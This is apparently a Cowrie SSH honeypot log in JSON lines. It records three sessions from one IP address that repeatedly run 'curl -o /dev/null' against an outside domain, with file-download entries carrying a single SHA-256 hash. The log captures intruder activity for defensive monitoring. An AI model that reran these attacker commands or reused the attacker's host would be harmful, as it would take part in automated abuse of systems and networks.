{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.070273Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.098798Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.102247Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.102870Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.108594Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.110371Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.111444Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.113640Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.114696Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.141310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.143168Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.145395Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.146960Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.152169Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.154516Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.158839Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.160065Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.207170Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.208672Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.209452Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.214923Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.218455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.221750Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.223853Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.225010Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.228730Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.229491Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.232477Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.283091Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.284061Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.285977Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.286803Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.293253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.296340Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.322541Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.323393Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.332475Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.333236Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.335628Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.338202Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.339352Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.340111Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.364426Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.366323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.368929Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.372046Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.373174Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.374024Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.378495Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.379700Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.385084Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.386231Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.413917Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.415814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.417372Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.418295Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.420797Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.421405Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.426193Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.429311Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.430048Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.456557Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.458781Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.460541Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.461102Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.464775Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.465956Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.469596Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.471008Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.471766Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.502755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.505553Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.507731Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.508938Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.514219Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.515499Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.520873Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.522057Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.522878Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.550452Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.551306Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
